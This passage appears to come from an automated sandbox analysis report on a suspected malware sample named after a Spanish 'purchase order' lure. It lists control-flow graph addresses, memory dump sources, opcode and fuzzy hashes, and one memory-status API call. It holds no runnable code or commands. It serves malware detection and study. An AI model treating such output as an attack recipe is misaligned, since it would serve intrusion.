1568->1572 1573 6b8c3d1-6b8c3d4 1568->1573 1579 6b8c56e 1570->1579 1580 6b8c573-6b8c576 1570->1580 1571->1570 1596 6b8c3cc 1572->1596 1597 6b8c441-6b8c444 1572->1597 1581 6b8c3d6-6b8c3f2 1573->1581 1582 6b8c3f7-6b8c3fa 1573->1582 1585 6b8c629-6b8c642 1575->1585 1586 6b8c647-6b8c64a 1575->1586 1579->1580 1580->1503 1590 6b8c57c-6b8c586 1580->1590 1581->1582 1591 6b8c3fc-6b8c421 1582->1591 1592 6b8c426-6b8c429 1582->1592 1585->1586 1594 6b8c64c-6b8c65a 1586->1594 1595 6b8c665-6b8c667 1586->1595 1591->1592 1603 6b8c42b-6b8c42e 1592->1603 1604 6b8c433-6b8c436 1592->1604 1594->1560 1614 6b8c660 1594->1614 1598 6b8c669 1595->1598 1599 6b8c66e-6b8c671 1595->1599 1596->1573 1613 6b8c449-6b8c44c 1597->1613 1598->1599 1599->1552 1599->1602 1609 6b8c689-6b8c692 1602->1609 1610 6b8c823-6b8c82d 1602->1610 1603->1604 1604->1537 1612 6b8c43c-6b8c43f 1604->1612 1615 6b8c698-6b8c6b8 1609->1615 1616 6b8c82e-6b8c83c 1609->1616 1612->1597 1612->1613 1618 6b8c4ae-6b8c4b1 1613->1618 1619 6b8c44e-6b8c4a9 1613->1619 1614->1595 1635 6b8c6be-6b8c6c7 1615->1635 1636 6b8c811-6b8c81d 1615->1636 1626 6b8c83e-6b8c866 1616->1626 1627 6b8c7d3-6b8c7d5 1616->1627 1618->1516 1618->1529 1619->1618 1628 6b8c868-6b8c86b 1626->1628 1630 6b8c7e3 1627->1630 1631 6b8c7d7-6b8c7e1 1627->1631 1633 6b8c871-6b8c87f 1628->1633 1634 6b8ca27-6b8ca2a 1628->1634 1637 6b8c7e8-6b8c7ea 1630->1637 1631->1637 1644 6b8c886-6b8c888 1633->1644 1638 6b8ca2c-6b8ca48 1634->1638 1639 6b8ca4d-6b8ca4f 1634->1639 1635->1616 1640 6b8c6cd-6b8c6fc call 6b865d8 1635->1640 1636->1609 1636->1610 1641 6b8c7ec-6b8c7f8 1637->1641 1642 6b8c7ff-6b8c80b 1637->1642 1638->1639 1645 6b8ca51 1639->1645 1646 6b8ca56-6b8ca59 1639->1646 1664 6b8c73e-6b8c754 1640->1664 1665 6b8c6fe-6b8c736 1640->1665 1641->1642 1642->1635 1642->1636 1649 6b8c88a-6b8c88d 1644->1649 1650 6b8c89f-6b8c8c9 1644->1650 1645->1646 1646->1628 1651 6b8ca5f-6b8ca68 1646->1651 1649->1651 1662 6b8ca1c-6b8ca26 1650->1662 1663 6b8c8cf-6b8c8d8 1650->1663 1667 6b8c8de-6b8c9ed call 6b865d8 1663->1667 1668 6b8c9f5-6b8ca1a 1663->1668 1671 6b8c772-6b8c788 1664->1671 1672 6b8c756-6b8c76a 1664->1672 1665->1664 1667->1663 1711 6b8c9f3 1667->1711 1668->1651 1680 6b8c78a-6b8c79e 1671->1680 1681 6b8c7a6-6b8c7b9 1671->1681 1672->1671 1680->1681 1687 6b8c7bb-6b8c7c5 1681->1687 1688 6b8c7c7 1681->1688 1691 6b8c7cc-6b8c7ce 1687->1691 1688->1691 1691->1642 1692 6b8c7d0 1691->1692 1692->1627 1711->1662
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.4544956627.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_6b80000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 240d7ba74366c4dd5ea625cd098cc9c137c060d1a7a47a0fe63efc56409d800a
                                          • Instruction ID: f7545bc5e9915c85b52389185a228daa4a19be49153416c5ce52d9652f0a133a
                                          • Opcode Fuzzy Hash: 240d7ba74366c4dd5ea625cd098cc9c137c060d1a7a47a0fe63efc56409d800a
                                          • Instruction Fuzzy Hash: 673293B4B002158FDF54EB69E890BAEBBB2FB88310F109569D505EB345DB35DC42CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.4544956627.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_6b80000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a9c2546b32d1f590ad546aa6561def9d4186ba66aca5fa1e082794031ba842ba
                                          • Instruction ID: 2b62bddc8d1fef4934124c143a846120248de6d61ad60529714ab856ad100a02
                                          • Opcode Fuzzy Hash: a9c2546b32d1f590ad546aa6561def9d4186ba66aca5fa1e082794031ba842ba
                                          • Instruction Fuzzy Hash: AA2251B0E102098FEF64EBB8D5907AEBBB2FB85310F249565E405EB391DA35DC81CB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 2437 6b83090-6b830b1 2438 6b830b3-6b830b6 2437->2438 2439 6b830b8-6b830d7 2438->2439 2440 6b830dc-6b830df 2438->2440 2439->2440 2441 6b83894-6b83896 2440->2441 2442 6b830e5-6b83104 2440->2442 2444 6b83898 2441->2444 2445 6b8389d-6b838a0 2441->2445 2450 6b8311d-6b83127 2442->2450 2451 6b83106-6b83109 2442->2451 2444->2445 2445->2438 2446 6b838a6-6b838af 2445->2446 2455 6b8312d-6b8313c 2450->2455 2451->2450 2452 6b8310b-6b8311b 2451->2452 2452->2455 2565 6b8313e call 6b838b9 2455->2565 2566 6b8313e call 6b838c0 2455->2566 2456 6b83143-6b83145 2457 6b83152-6b8342f 2456->2457 2458 6b83147-6b8314d 2456->2458 2479 6b83435-6b834e4 2457->2479 2480 6b83886-6b83893 2457->2480 2458->2446 2489 6b8350d 2479->2489 2490 6b834e6-6b8350b 2479->2490 2491 6b83516-6b83526 2489->2491 2490->2491 2494 6b8352c-6b8354b 2491->2494 2495 6b8386d-6b83879 2491->2495 2494->2495 2498 6b83551-6b8355b 2494->2498 2495->2479 2496 6b8387f 2495->2496 2496->2480 2498->2495 2499 6b83561-6b8356c 2498->2499 2499->2495 2500 6b83572-6b83648 2499->2500 2512 6b8364a-6b8364c 2500->2512 2513 6b83656-6b83686 2500->2513 2512->2513 2517 6b83688-6b8368a 2513->2517 2518 6b83694-6b836a0 2513->2518 2517->2518 2519 6b836a2-6b836a6 2518->2519 2520 6b83706-6b83721 2518->2520 2519->2520 2521 6b836a8-6b836d2 2519->2521 2523 6b8385e-6b83867 2520->2523 2524 6b83727-6b83763 2520->2524 2530 6b836e0-6b836ff 2521->2530 2531 6b836d4-6b836d6 2521->2531 2523->2495 2523->2500 2536 6b83771-6b8377f 2524->2536 2537 6b83765-6b83767 2524->2537 2530->2524 2535 6b83701 2530->2535 2531->2530 2535->2523 2539 6b83781-6b8378c 2536->2539 2540 6b83796-6b837a1 2536->2540 2537->2536 2539->2540 2545 6b8378e 2539->2545 2543 6b837b9-6b837ca 2540->2543 2544 6b837a3-6b837a9 2540->2544 2549 6b837cc-6b837d2 2543->2549 2550 6b837e2-6b837ee 2543->2550 2546 6b837ab 2544->2546 2547 6b837ad-6b837af 2544->2547 2545->2540 2546->2543 2547->2543 2551 6b837d4 2549->2551 2552 6b837d6-6b837d8 2549->2552 2554 6b837f0-6b837f6 2550->2554 2555 6b83806-6b83857 2550->2555 2551->2550 2552->2550 2556 6b837f8 2554->2556 2557 6b837fa-6b837fc 2554->2557 2555->2523 2556->2555 2557->2555 2565->2456 2566->2456
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.4544956627.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_6b80000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 45b18d30514bc63606cfa318ac5f2a69b15cece22730b2d1f4cbb476c4995da2
                                          • Instruction ID: 4840790ac2314481335b71d820b39b577d1b102f4f32808f32b61780aebf17f2
                                          • Opcode Fuzzy Hash: 45b18d30514bc63606cfa318ac5f2a69b15cece22730b2d1f4cbb476c4995da2
                                          • Instruction Fuzzy Hash: 7B323D34E1061ACFCB54EBB5C85469DB7B2FFC9300F6096AAD509A7254EF70AD85CB80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.4544956627.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_6b80000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9bcf61672bb33ac3440be7ab28666c927b9b66b1043fd4e6e5f3edf4bb090573
                                          • Instruction ID: 22f65f8a5beae2ec4b3720db09747e77d2405fd97074805a9db0e8eea900ff71
                                          • Opcode Fuzzy Hash: 9bcf61672bb33ac3440be7ab28666c927b9b66b1043fd4e6e5f3edf4bb090573
                                          • Instruction Fuzzy Hash: 0D029F70B01216CFDB58EF69D9507AEB7A2FF84304F648569D806AB394DB75EC42CB80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 249 2cdec10-2cdec18 250 2cdec1a-2cdec1c 249->250 251 2cdebd7-2cdebf0 call 2cdec10 249->251 253 2cdec1e-2cdec2b 250->253 254 2cdebca 250->254 257 2cdebf6-2cdebfa 251->257 255 2cdec2d-2cdec54 253->255 256 2cdec55-2cdec6b 253->256 254->251 282 2cdec6d call 2cdecf8 256->282 283 2cdec6d call 2cdec10 256->283 260 2cdebfc-2cdec01 257->260 261 2cdec03-2cdec06 257->261 262 2cdec09-2cdec0b 260->262 261->262 263 2cdec72-2cdec74 264 2cdec7a-2cdecd9 263->264 265 2cdec76-2cdec79 263->265 272 2cdecdf-2cded6c GlobalMemoryStatusEx 264->272 273 2cdecdb-2cdecde 264->273 277 2cded6e-2cded74 272->277 278 2cded75-2cded9d 272->278 277->278 282->263 283->263
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.4531066185.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_2cd0000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2d293b6b4786dcb560467ab0082bb0e6d1195824091e496ca48f8f6abed6633b
                                          • Instruction ID: 3ad6e1e462e2ed7b0ef2374d8f622015f3458bab23f91142381ecc4704a0f50c
                                          • Opcode Fuzzy Hash: 2d293b6b4786dcb560467ab0082bb0e6d1195824091e496ca48f8f6abed6633b
                                          • Instruction Fuzzy Hash: 22518332D047989FCB14EFB9D8043DEBBF5AFC9210F04856AE609AB241DB749841CBE1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 284 2cdecf8-2cded6c GlobalMemoryStatusEx 286 2cded6e-2cded74 284->286 287 2cded75-2cded9d 284->287 286->287
                                          APIs
                                          • GlobalMemoryStatusEx.KERNELBASE ref: 02CDED5F
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.4531066185.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_2cd0000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID: GlobalMemoryStatus
                                          • String ID:
                                          • API String ID: 1890195054-0
                                          • Opcode ID: 204fecea2164ab4dc5c4ebb876877f14390a7c6c0186df4f814d80b01964ca08
                                          • Instruction ID: 8031d2f270f5ee4751dfd3655e2ed3ca2ee0d3d3be5281730ad173f8666913fd
                                          • Opcode Fuzzy Hash: 204fecea2164ab4dc5c4ebb876877f14390a7c6c0186df4f814d80b01964ca08
                                          • Instruction Fuzzy Hash: 8B1112B1C0065A9BDB10DF9AC544B9EFBF4AF48720F10816AD918B7240D778A950CFA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1242 6b8cfb8-6b8cfd3 1243 6b8cfd5-6b8cfd8 1242->1243 1244 6b8cfda-6b8d01c 1243->1244 1245 6b8d021-6b8d024 1243->1245 1244->1245 1246 6b8d02e-6b8d031 1245->1246 1247 6b8d026-6b8d02b 1245->1247 1248 6b8d4a4-6b8d4b0 1246->1248 1249 6b8d037-6b8d03a 1246->1249 1247->1246 1251 6b8d0fa-6b8d109 1248->1251 1252 6b8d4b6-6b8d7a3 1248->1252 1253 6b8d03c-6b8d058 1249->1253 1254 6b8d05d-6b8d060 1249->1254 1255 6b8d118-6b8d124 1251->1255 1256 6b8d10b-6b8d110 1251->1256 1454 6b8d7a9-6b8d7af 1252->1454 1455 6b8d9ca-6b8d9d4 1252->1455 1253->1254 1258 6b8d0a9-6b8d0ac 1254->1258 1259 6b8d062-6b8d071 1254->1259 1262 6b8d12a-6b8d13c 1255->1262 1263 6b8d9d5-6b8da0e 1255->1263 1256->1255 1264 6b8d0ae-6b8d0f0 1258->1264 1265 6b8d0f5-6b8d0f8 1258->1265 1260 6b8d080-6b8d08c 1259->1260 1261 6b8d073-6b8d078 1259->1261 1260->1263 1269 6b8d092-6b8d0a4 1260->1269 1261->1260 1270 6b8d141-6b8d144 1262->1270 1282 6b8da10-6b8da13 1263->1282 1264->1265 1265->1251 1265->1270 1269->1258 1275 6b8d161-6b8d164 1270->1275 1276 6b8d146-6b8d15c 1270->1276 1278 6b8d1ad-6b8d1b0 1275->1278 1279 6b8d166-6b8d1a8 1275->1279 1276->1275 1287 6b8d1bf-6b8d1c2 1278->1287 1288 6b8d1b2-6b8d1b4 1278->1288 1279->1278 1283 6b8da15-6b8da31 1282->1283 1284 6b8da36-6b8da39 1282->1284 1283->1284 1294 6b8da3b-6b8da67 1284->1294 1295 6b8da6c-6b8da6f 1284->1295 1290 6b8d1d1-6b8d1d4 1287->1290 1291 6b8d1c4-6b8d1c6 1287->1291 1296 6b8d1ba 1288->1296 1297 6b8d35f-6b8d368 1288->1297 1302 6b8d21d-6b8d220 1290->1302 1303 6b8d1d6-6b8d218 1290->1303 1298 6b8d1cc 1291->1298 1299 6b8d4a1 1291->1299 1294->1295 1307 6b8da7e-6b8da80 1295->1307 1308 6b8da71 call 6b8db2d 1295->1308 1296->1287 1300 6b8d36a-6b8d36f 1297->1300 1301 6b8d377-6b8d383 1297->1301 1298->1290 1299->1248 1300->1301 1313 6b8d389-6b8d39d 1301->1313 1314 6b8d494-6b8d499 1301->1314 1315 6b8d269-6b8d26c 1302->1315 1316 6b8d222-6b8d264 1302->1316 1303->1302 1311 6b8da82 1307->1311 1312 6b8da87-6b8da8a 1307->1312 1322 6b8da77-6b8da79 1308->1322 1311->1312 1312->1282 1323 6b8da8c-6b8da9b 1312->1323 1313->1299 1338 6b8d3a3-6b8d3b5 1313->1338 1314->1299 1318 6b8d26e-6b8d2b0 1315->1318 1319 6b8d2b5-6b8d2b8 1315->1319 1316->1315 1318->1319 1328 6b8d2ba-6b8d2fc 1319->1328 1329 6b8d301-6b8d304 1319->1329 1322->1307 1343 6b8da9d-6b8db00 call 6b865d8 1323->1343 1344 6b8db02-6b8db17 1323->1344 1328->1329 1331 6b8d34d-6b8d34f 1329->1331 1332 6b8d306-6b8d348 1329->1332 1341 6b8d351 1331->1341 1342 6b8d356-6b8d359 1331->1342 1332->1331 1356 6b8d3d9-6b8d3db 1338->1356 1357 6b8d3b7-6b8d3bd 1338->1357 1341->1342 1342->1243 1342->1297 1343->1344 1365 6b8d3e5-6b8d3f1 1356->1365 1363 6b8d3bf 1357->1363 1364 6b8d3c1-6b8d3cd 1357->1364 1369 6b8d3cf-6b8d3d7 1363->1369 1364->1369 1380 6b8d3ff 1365->1380 1381 6b8d3f3-6b8d3fd 1365->1381 1369->1365 1387 6b8d404-6b8d406 1380->1387 1381->1387 1387->1299 1388 6b8d40c-6b8d428 call 6b865d8 1387->1388 1399 6b8d42a-6b8d42f 1388->1399 1400 6b8d437-6b8d443 1388->1400 1399->1400 1400->1314 1402 6b8d445-6b8d492 1400->1402 1402->1299 1456 6b8d7be-6b8d7c7 1454->1456 1457 6b8d7b1-6b8d7b6 1454->1457 1456->1263 1458 6b8d7cd-6b8d7e0 1456->1458 1457->1456 1460 6b8d9ba-6b8d9c4 1458->1460 1461 6b8d7e6-6b8d7ec 1458->1461 1460->1454 1460->1455 1462 6b8d7fb-6b8d804 1461->1462 1463 6b8d7ee-6b8d7f3 1461->1463 1462->1263 1464 6b8d80a-6b8d82b 1462->1464 1463->1462 1467 6b8d83a-6b8d843 1464->1467 1468 6b8d82d-6b8d832 1464->1468 1467->1263 1469 6b8d849-6b8d866 1467->1469 1468->1467 1469->1460 1472 6b8d86c-6b8d872 1469->1472 1472->1263 1473 6b8d878-6b8d891 1472->1473 1475 6b8d9ad-6b8d9b4 1473->1475 1476 6b8d897-6b8d8be 1473->1476 1475->1460 1475->1472 1476->1263 1479 6b8d8c4-6b8d8ce 1476->1479 1479->1263 1480 6b8d8d4-6b8d8eb 1479->1480 1482 6b8d8fa-6b8d915 1480->1482 1483 6b8d8ed-6b8d8f8 1480->1483 1482->1475 1488 6b8d91b-6b8d934 call 6b865d8 1482->1488 1483->1482 1492 6b8d943-6b8d94c 1488->1492 1493 6b8d936-6b8d93b 1488->1493 1492->1263 1494 6b8d952-6b8d9a6 1492->1494 1493->1492 1494->1475
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.4544956627.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_6b80000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9221e8bff612e56abd574a4d4422e89caeaf6fc47181af66e31d188b2749c526
                                          • Instruction ID: 1591802004384a4518dbbfffbb48e50490fc69457b3c0104632ac78baf8d352c
                                          • Opcode Fuzzy Hash: 9221e8bff612e56abd574a4d4422e89caeaf6fc47181af66e31d188b2749c526
                                          • Instruction Fuzzy Hash: B8627D30A0021ACFDB55EB69D980A5EB7B2FF85310B209A6DD1059F399DF75EC46CB80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.4544956627.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_6b80000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b1803b0a8e71c4a6cb2523c5a61b119923ca196702c3a4696f57132296ed10dd
                                          • Instruction ID: d04e7bf30828d4bdbd92a2f16912d571d9ffd2767218d05033a53fdbba55db15
                                          • Opcode Fuzzy Hash: b1803b0a8e71c4a6cb2523c5a61b119923ca196702c3a4696f57132296ed10dd
                                          • Instruction Fuzzy Hash: FD026DB0E0020ADFDB64EFA8D480AADB7B1FB85310F1495AAE415EB351DB75EC41CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.4544956627.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_6b80000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: aa1df290654943385ffe4e4bbc0dd0c089e69639f3854706299df6e6110e1744
                                          • Instruction ID: 95007950bbaed14a6c3c56c8f284b02a6d1ab73d1068dc3770ac121f51857e87
                                          • Opcode Fuzzy Hash: aa1df290654943385ffe4e4bbc0dd0c089e69639f3854706299df6e6110e1744
                                          • Instruction Fuzzy Hash: 8DE17F70E10216CFDB69EB69D4806AEBBB2FF85300F20956AD505EB344DB75DC46CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.4544956627.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_6b80000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0ceade4e5c494be303a01582862f2d3e2c7ffcaba14616d6e787aa6645a127e8
                                          • Instruction ID: 441fcea9c35a944a983a96b2dd550430fd2826ff4250c588a4159815ba34d554
                                          • Opcode Fuzzy Hash: 0ceade4e5c494be303a01582862f2d3e2c7ffcaba14616d6e787aa6645a127e8
                                          • Instruction Fuzzy Hash: 3B913E70B0021A8FDB54EF69D9507AEB7B2FF89600F1085A9D809EB384EB75DD41CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.4544956627.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_6b80000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e2afe8271c85f66d812bae1e62c8e66f17acdfe92c7c1f036f47a07170978e8c
                                          • Instruction ID: 03c79983da8dcaca911c6ad8bdf744bb322f0398296db3a9579fb96ddebcbaa9
                                          • Opcode Fuzzy Hash: e2afe8271c85f66d812bae1e62c8e66f17acdfe92c7c1f036f47a07170978e8c
                                          • Instruction Fuzzy Hash: 4661A3B1F000214FDF54AA6EC854A5FBADBEFC4610B154479D80ADB3A0EEA9DD02CB85
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.4544956627.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_6b80000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c270bd9cda8b221b2422d07f07b9df9537c89484b52d85d0eea93aeadb4f4264
                                          • Instruction ID: 9fdf47b3096455516f5e7676c827f1c08d18862e1dc8aab9cc6a65ee4b20a609
                                          • Opcode Fuzzy Hash: c270bd9cda8b221b2422d07f07b9df9537c89484b52d85d0eea93aeadb4f4264
                                          • Instruction Fuzzy Hash: C3812A70B012068FDF54EBA9D4507AEB7E2EF89701F108569D90AEB384EA75DC42CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.4544956627.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_6b80000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 12bad54922db2e9e3f12767bb5a36f21a7f5591b1f9989aeb2f1818a8d402c3e
                                          • Instruction ID: 8710b3131391a51a02cf7300e714f1e848f5a40d4ea1d985886cf3c0e028cbbf
                                          • Opcode Fuzzy Hash: 12bad54922db2e9e3f12767bb5a36f21a7f5591b1f9989aeb2f1818a8d402c3e
                                          • Instruction Fuzzy Hash: 1D916070E1025A8FDF60DF68C85079DBBB1FF89310F208599D549AB385DB71AA85CF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.4544956627.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_6b80000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 702adbaae42a295cdfbf94b592dcaa9a8c9ff394357c19f9db84e074d215acb3
                                          • Instruction ID: 9f20aaf9ed06339fb6f8f43706d431b32d2440a1f047cb58866802f507e1c14f
                                          • Opcode Fuzzy Hash: 702adbaae42a295cdfbf94b592dcaa9a8c9ff394357c19f9db84e074d215acb3
                                          • Instruction Fuzzy Hash: BD913C74E1021A8FDF64DF68C840B9DB7B1FF89310F208599D509AB385DB71AA85CF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.4544956627.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_6b80000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cd416c52a957e5779442a5ceda64e2cc6f37ef48b16a7666c00dcccf435fae27
                                          • Instruction ID: dbbe60367f7fcf77d1085ad8400352948893f0a179633c6ec0fff45687edb62c
                                          • Opcode Fuzzy Hash: cd416c52a957e5779442a5ceda64e2cc6f37ef48b16a7666c00dcccf435fae27
                                          • Instruction Fuzzy Hash: 26713CB0A002199FDB54EFA9D980AADBBF6FF84350F248569E415EB354DB30EC46CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.4544956627.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_6b80000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 377ffef20263e8e5ea3c8d6740e072ca8a02077f7979e3e75a2762d0b67499b1
                                          • Instruction ID: 70ef67a5fe36fc18a88ecd0a8a6c8293b02ef6cc45fe7d0ac9bc4f84ac04197d
                                          • Opcode Fuzzy Hash: 377ffef20263e8e5ea3c8d6740e072ca8a02077f7979e3e75a2762d0b67499b1
                                          • Instruction Fuzzy Hash: 66713AB0A002199FDB54EFA9D980AADBBF6FF84340F248569D405EB354DB30EC46CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.4544956627.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_6b80000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a33f61ef99f13a774fc3703eae506a497c7fd70a6df576b6f281c138204be33a
                                          • Instruction ID: ee160082237a2a8d8525427ad6330c08f64a6c7423598b664347585b43f666ad
                                          • Opcode Fuzzy Hash: a33f61ef99f13a774fc3703eae506a497c7fd70a6df576b6f281c138204be33a
                                          • Instruction Fuzzy Hash: 2D618070F002199FEF54AFA9C8547AEBBF6FB88700F208469D506AB394DE758C45CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.4544956627.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_6b80000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 08311386dfb0fde96b88f2bc23606e6afde315ca639bfd21c8bc6802bc6bf2bd
                                          • Instruction ID: 1b092fee2832054ecd944b2d92bee74d8f441bd3ef134abaa969d320d94827cc
                                          • Opcode Fuzzy Hash: 08311386dfb0fde96b88f2bc23606e6afde315ca639bfd21c8bc6802bc6bf2bd
                                          • Instruction Fuzzy Hash: D551F571E01109DFCF54FBB8E4846BEB7B6EF85351F1048A9E206D7251DB359846C780
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.4544956627.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_6b80000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 70ca684ba9cf088e8be3d8327af8d6bdc33d6e68a460e5bc5b7536c0fa0d640b
                                          • Instruction ID: f744fdd1879a7445eef15d77c5e62acab352499823a7ffb3c1f7342937e5b21e
                                          • Opcode Fuzzy Hash: 70ca684ba9cf088e8be3d8327af8d6bdc33d6e68a460e5bc5b7536c0fa0d640b
                                          • Instruction Fuzzy Hash: AA5194B0F102148FEF6466F8D85477F3A5EDBC9390F205669E50AC7396CA69CC41C792
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.4544956627.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_6b80000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
